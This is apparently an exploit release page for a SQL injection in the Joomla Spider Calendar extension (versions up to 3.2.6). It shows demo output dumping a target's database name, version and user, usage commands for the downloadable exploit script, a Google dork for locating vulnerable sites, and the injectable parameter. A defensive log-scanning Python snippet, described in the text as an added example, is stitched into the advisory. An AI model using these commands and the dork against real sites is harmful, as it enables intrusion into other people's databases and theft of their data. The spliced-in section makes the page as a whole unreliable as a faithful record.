Joomla Spider Calendar 3.2.6 SQL Injection Exploit + Demo

Joomla Spider Calendar

 

   $$$$$\                                   $$\                  $$$$$$\            $$\       $$\
   \__$$ |                                  $$ |                $$  __$$\           \__|      $$ |
      $$ | $$$$$$\   $$$$$$\  $$$$$$\$$$$\  $$ | $$$$$$\        $$ /  \__| $$$$$$\  $$\  $$$$$$$ | $$$$$$\   $$$$$$\
      $$ |$$  __$$\ $$  __$$\ $$  _$$  _$$\ $$ | \____$$\       \$$$$$$\  $$  __$$\ $$ |$$  __$$ |$$  __$$\ $$  __$$\
$$\   $$ |$$ /  $$ |$$ /  $$ |$$ / $$ / $$ |$$ | $$$$$$$ |       \____$$\ $$ /  $$ |$$ |$$ /  $$ |$$$$$$$$ |$$ |  \__|
$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ |$$ |$$  __$$ |      $$\   $$ |$$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |
\$$$$$$  |\$$$$$$  |\$$$$$$  |$$ | $$ | $$ |$$ |\$$$$$$$ |      \$$$$$$  |$$$$$$$  |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
 \______/  \______/  \______/ \__| \__| \__|\__| \_______|       \______/ $$  ____/ \__| \_______| \_______|\__|
                                                                          $$ |
                                                                          $$ |
                                                                          \__|

     $$$$$$\            $$\                           $$\                            $$$$$$\       $$$$$$\      $$$$$$\
    $$  __$$\           $$ |                          $$ |                          $$ ___$$\     $$  __$$\    $$  __$$\
    $$ /  \__| $$$$$$\  $$ | $$$$$$\  $$$$$$$\   $$$$$$$ | $$$$$$\   $$$$$$\        \_/   $$ |    \__/  $$ |   $$ /  \__|
    $$ |       \____$$\ $$ |$$  __$$\ $$  __$$\ $$  __$$ | \____$$\ $$  __$$\         $$$$$ /      $$$$$$  |   $$$$$$$\
    $$ |       $$$$$$$ |$$ |$$$$$$$$ |$$ |  $$ |$$ /  $$ | $$$$$$$ |$$ |  \__|        \___$$\     $$  ____/    $$  __$$\
    $$ |  $$\ $$  __$$ |$$ |$$   ____|$$ |  $$ |$$ |  $$ |$$  __$$ |$$ |            $$\   $$ |    $$ |         $$ /  $$ |
    \$$$$$$  |\$$$$$$$ |$$ |\$$$$$$$\ $$ |  $$ |\$$$$$$$ |\$$$$$$$ |$$ |            \$$$$$$  |$$\ $$$$$$$$\ $$\ $$$$$$  |
     \______/  \_______|\__| \_______|\__|  \__| \_______| \_______|\__|             \______/ \__|\________|\__|\______/

                                                                                         j00ml4 Spid3r C4l3nd4r >= 2.x <= 3.2.6 SQLi

                                                            Written by:

                                                          Claudio Viviani

                                                       http://www.homelab.it

                                                          info@homelab.it
                                                       homelabit@protonmail.ch

                                                 https://www.facebook.com/homelabit
                                                    https://twitter.com/homelabit
                                                 https://plus.google.com/+HomelabIt1/
                                        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[+] Searching for Joomla Spider Calendar vulnerability...
[+]
[!] Boolean SQL injection vulnerability FOUND!
[+]
[+] Detection version in progress....
[+]
[+] EXTENSION VERSION: 3.2.6
[+]
[!] http://10.0.0.67 VULNERABLE!!!
[+]
[!] DB NAME : joomla
[!] DB VERS : 5.0.95
[!] DB USER : pippo@localhost

 

 

Exploit Usage

1) Joomla standard path:    http://localhost/index.php?option=com_spidercalendar
                            [user@localhost ~]$ python j00ml4_spider_calendar_326_sqli.py -H http://localhost

2) Joomla Custom path:      http://localhost/joomla/index.php?option=com_spidercalendar
                            [user@localhost ~]$ python j00ml4_spider_calendar_326_sqli.py -H http://localhost -b joomla

Download

Download : j00ml4_spider_calendar_326_sqli.py
           j00ml4_spider_calendar_326_sqli.py (Mega mirror)

Info

######################

# Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://web-dorado.com/

# Software Link : http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329

# Dork Google: inurl:option=com_spidercalendar

# Date : 2014-08-31

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://localhost/joomla/index.php?option=com_spidercalendar&calendar_id=1 [SQLi]

The "calendar_id" request parameter is not sanitized before it is used in a SQL query.
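
A defensive check for the flaw described above, as an added example that is not part of the original advisory or exploit script: it scans web access logs for `com_spidercalendar` requests whose `calendar_id` is not a plain integer. The log lines, IP addresses, function name and the combined log format are constructed assumptions, as is the premise that legitimate calendar IDs are integers like the `1` in the PoC URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2014:10:00:01 +0000] "GET /index.php?option=com_spidercalendar&calendar_id=1 HTTP/1.1" 200 5120
203.0.113.9 - - [05/Sep/2014:10:00:07 +0000] "GET /joomla/index.php?option=com_spidercalendar&calendar_id=1%20AND%201%3D1 HTTP/1.1" 200 5120
203.0.113.9 - - [05/Sep/2014:10:00:08 +0000] "GET /joomla/index.php?option=com_spidercalendar&calendar_id=1%20AND%201%3D2 HTTP/1.1" 200 312
203.0.113.7 - - [05/Sep/2014:10:00:09 +0000] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 900
198.51.100.4 - - [05/Sep/2014:10:00:12 +0000] "GET /index.php?option=com_spidercalendar&calendar_id=2&calendar_id=2%27 HTTP/1.1" 200 5120
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Allowlist: the only shape a calendar ID is assumed to have.
INT_RE = re.compile(r"\d{1,10}")


def suspicious_requests(log_text):
    """Return (client_ip, decoded calendar_id) for every com_spidercalendar
    request whose calendar_id is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        # parse_qs URL-decodes values and keeps repeated parameters as a list,
        # so a benign first value cannot hide a malformed second one.
        query = parse_qs(urlsplit(m.group("target")).query,
                         keep_blank_values=True)
        if "com_spidercalendar" not in query.get("option", []):
            continue
        for value in query.get("calendar_id", []):
            if not INT_RE.fullmatch(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: non-integer calendar_id {value!r}")
```

The check only sees parameters that reach the access log, so requests that carry `calendar_id` in a POST body need the same allowlist applied at a WAF or in the application.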

######################

# Vulnerability Disclosure Timeline:

2014-08-31:  Discovered vulnerability
2014-09-04:  Vendor Notification
2014-09-05:  Vendor Response/Feedback
2014-09-05:  Vendor Fix/Patch
2014-09-05:  Public Disclosure
 
#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
        
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################